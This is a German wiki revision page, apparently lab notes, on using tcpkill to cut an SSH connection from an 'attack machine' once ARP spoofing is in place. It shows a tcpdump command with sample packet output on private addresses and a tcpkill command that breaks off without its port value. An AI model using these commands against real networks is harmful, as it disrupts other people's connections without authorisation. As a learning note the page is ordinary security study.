Tcpkill: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) |
||
| Zeile 8: | Zeile 8: | ||
11:36:46.940810 IP 10.81.3.1.46354 > 10.81.1.9.8472: Flags [.], ack 3994, win 320, options [nop,nop,TS val 1300734 ecr 2668654015], length 0 | 11:36:46.940810 IP 10.81.3.1.46354 > 10.81.1.9.8472: Flags [.], ack 3994, win 320, options [nop,nop,TS val 1300734 ecr 2668654015], length 0 | ||
==Verbindung killen== | ==Verbindung killen== | ||
| − | *tcpkill -i eth0 host 10.81.3.1 and port | + | *tcpkill -i eth0 host 10.81.3.1 and port |
Version vom 9. November 2017, 10:44 Uhr
Vorraussetung Arp Spoofing
SSH Killen
Auf dem Angriffrechner
Port herausfinden
- tcpdump -ni eth0 host 10.81.1.9 and host 10.81.3.1
11:36:46.940532 IP 10.81.1.9.8472 > 10.81.3.1.46354: Flags [P.], seq 3918:3994, ack 3154, win 272, options [nop,nop,TS val 2668654015 ecr 1300733], length 76 11:36:46.940810 IP 10.81.3.1.46354 > 10.81.1.9.8472: Flags [.], ack 3994, win 320, options [nop,nop,TS val 1300734 ecr 2668654015], length 0
Verbindung killen
- tcpkill -i eth0 host 10.81.3.1 and port